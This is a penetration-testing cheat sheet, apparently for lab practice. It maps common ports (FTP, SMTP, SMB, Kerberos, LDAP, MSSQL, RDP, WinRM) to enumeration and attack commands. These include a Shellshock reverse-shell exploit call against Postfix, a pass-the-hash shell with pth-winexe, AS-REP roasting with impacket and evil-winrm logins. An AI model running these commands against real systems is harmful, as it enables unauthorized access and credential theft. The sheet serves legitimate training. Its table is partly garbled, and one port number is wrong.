COMMON PORTS AND USES
PORTS / ASSOCIATED COMMANDS / TARGET PROTOCOL
| Port | Commands | Target |
|---|---|---|
| 21 | FTP | |
Try anonymous logins ftp [email protected] | ||
| 25 | SMTP | |
telnet 10.10.10.10 25 VRFY user FINISH SESSION: Ctl + ] / close VULN SHELLSHOCK – need valid email addres: python2 postfix-shellshock-nc.py 10.10.10.10 [email protected] LHOST LPORT | ||
| 110 | POP | |
| 143 | IMAP | |
| 587 | SECURE EMAIL | |
| 80 / 443 | WEB | |
| Dirb / Dirbuster / Gobuster / Nikto / Curl RFI / LFI / SQLI | ||
| 88 / 464 | KERBEROS | |
pth-winexe -U WORKGROUP/User%Pass //10.11.1.220 cmd.exe | ||
| 111 | NFS | |
showmount -a / -e | ||
| 135 | RPC | |
impacket-rpcdump | ||
| 139 / 445 | SMB | |
nmap --script nbstat.nse <ip> nmap --script smb-os-discovery <ip> nmap --script smb-enum-shares -p139,445 <ip> nmap --script smb-vuln* <ip> 'net' command on kali crackmapexec smb -u -p rpcclient -U '' -N impacket-lookupsid enum4linux VERSIONS FOR ANALYSIS: CIFS (OLD WIND NT 4.0) SMB 1.0 / SMB1 – WIN2K / WINXP / WIN SRV 2003 WIN SRV 2003 R2 SMB 2.0 / SMB2 – WIN VISTA / WIN SRV 2008 SMB 2.1 / SMB2.1 – WIN 7 / WIN SRV 2008 R2 SMB 3.0 / SMB3 – WIN 8 / WIN SRV 2012 SMB 3.02 / SMB3 – WIN 8.1 / WIN SRV 2012 R2 SMB 3.1 / SMB 3.1.1 (SECURE NEGOTIATION) – WIN SRV 2016 / WIN 10 | ||
| 1443 | MSSQL | |
nmap --script ms-sql* -p1433 sqsh -S 10.11.1.31 -U sa | ||
| 3306 | MYSQL | |
mysql -u <user> -p <pass> show databases; show tables; | ||
| 389 / 3268 | LDAP | |
nmap -sT -Pn -n --open <ip> -p389 --script ldap-rootdse nmap -p 389 --script ldap-search <ip> dig srv _ldap._tcp.dc._msdcs.<FULL-DOMAIN-NAME> @10.11.1.220 impacket-GetNPUsers thinc/10.11.1.220 -dc-ip 10.11.1.220 -request | ||
| 3389 | RDP | |
rdesktop -u <user> -p <pass> <host> | ||
| 5985 / 5986 | WINRM | |
evil-winrm -u <user> -p <pass> -i <host> | ||
| BACK TO HOME | REFERENCE PAGE |